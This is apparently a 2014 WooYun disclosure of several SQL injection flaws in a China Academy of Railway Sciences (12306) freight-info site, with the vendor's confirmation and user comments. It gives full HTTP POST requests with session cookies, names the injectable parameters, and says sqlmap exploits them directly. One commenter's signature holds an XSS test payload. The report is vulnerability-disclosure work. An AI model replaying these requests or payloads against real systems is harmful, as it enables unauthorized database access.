当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059597

漏洞标题:中国铁道科学研究院(12306)多处SQL注入漏洞

相关厂商:中国铁道科学研究院

漏洞作者: 酱油甲

提交时间:2014-05-06 10:51

修复时间:2014-06-20 10:52

公开时间:2014-06-20 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-06: 细节已通知厂商并且等待厂商处理中
2014-05-06: 厂商已经确认,细节仅向厂商公开
2014-05-16: 细节向核心白帽子及相关领域专家公开
2014-05-26: 细节向普通白帽子公开
2014-06-05: 细节向实习白帽子公开
2014-06-20: 细节向公众公开

简要描述:

中国铁道科学研究院(12306)多处SQL注入漏洞

详细说明:

中国铁道科学研究院
注入点:hyfw.12306.cn/hyinfo/action/JgxxAction_jsjjfl
构造数据包:

POST /hyinfo/action/JgxxAction_jsjjfl HTTP/1.1
Host: hyfw.12306.cn
Proxy-Connection: keep-alive
Content-Length: 6
Accept: */*
Origin: http://hyfw.12306.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://hyfw.12306.cn/hyinfo/action/JgxxAction_index?type=2
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: TVvHsVfkbo=MDAwM2IyOWE2NjgwMDAwMDAwMDIwFnwgVT8xMzk5MzMyNjQw; JSESSIONID=3cyKTnzdgfCC1kvQD0plHnsHt0cvHXDKgXBJBfrpD5Xm91VjnTtL!182003097; JhVfuvhdaD=MDAwM2IyOWFhMDAwMDAwMDAwMDgwCx1OITUxMzk5MzI5NzE2; 0Bnf0WSH3k=MDAwM2IyNTNkYjAwMDAwMDAwMjIwRFUvU1UxMzk5MzMxMDc5
lx=jzx


直接扔sqlmap即可注出
第二处SQL注射:
注入点:hyfw.12306.cn/hyinfo/action/JgxxAction_pmplxx
注入参数:pm
构造数据包

POST /hyinfo/action/JgxxAction_pmplxx HTTP/1.1
Host: hyfw.12306.cn
Proxy-Connection: keep-alive
Content-Length: 46
Accept: */*
Origin: http://hyfw.12306.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://hyfw.12306.cn/hyinfo/action/JgxxAction_index?type=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: TVvHsVfkbo=MDAwM2IyOWE2NjgwMDAwMDAwMDIwFnwgVT8xMzk5MzMyNjQw; JSESSIONID=3cyKTnzdgfCC1kvQD0plHnsHt0cvHXDKgXBJBfrpD5Xm91VjnTtL!182003097; JhVfuvhdaD=MDAwM2IyOWFhMDAwMDAwMDAwMDgwCx1OITUxMzk5MzI5NzE2; 0Bnf0WSH3k=MDAwM2IyNTNkYjAwMDAwMDAwMjIwRFUvU1UxMzk5MzMxMDc5
pl=0260&pm=0110003&plfh=0260&pmfh=0110003&bs=1


SQLMAP即可注出
第三处SQL注入点:
注入点:http://hyfw.12306.cn/hyinfo/action/JgxxAction_hwyjl?lx=00

1.jpg


直接sqlmap

漏洞证明:

31.jpg


32.jpg


33.jpg


21.jpg


22.jpg


2.jpg


3.jpg


4.jpg

修复方案:

过滤
注:什么都没做,求不查水表

版权声明:转载请注明来源 酱油甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-05-06 15:59

厂商回复:

正在检查。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-05-06 11:15 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    多处,顶个

  2. 2014-05-06 14:28 | leir ( 路人 | Rank:0 漏洞数:1 | ???)

    @Mody 这个和12306关系不大吧?

  3. 2014-05-06 17:19 | 酱油甲 ( 普通白帽子 | Rank:645 漏洞数:126 | 打个酱油,吃个海蜇~)

    @xsser 这就是我一开始想分开交这几个sqlin的原因,一堆洞才给6rank~~T-T太小气了~~

  4. 2014-05-06 17:24 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    @酱油甲 比忽略好

  5. 2014-06-20 15:46 | keke ( 路人 | Rank:6 漏洞数:8 | 目测和口算各种妹纸)

    @leirni 你个屌毛是12306的托?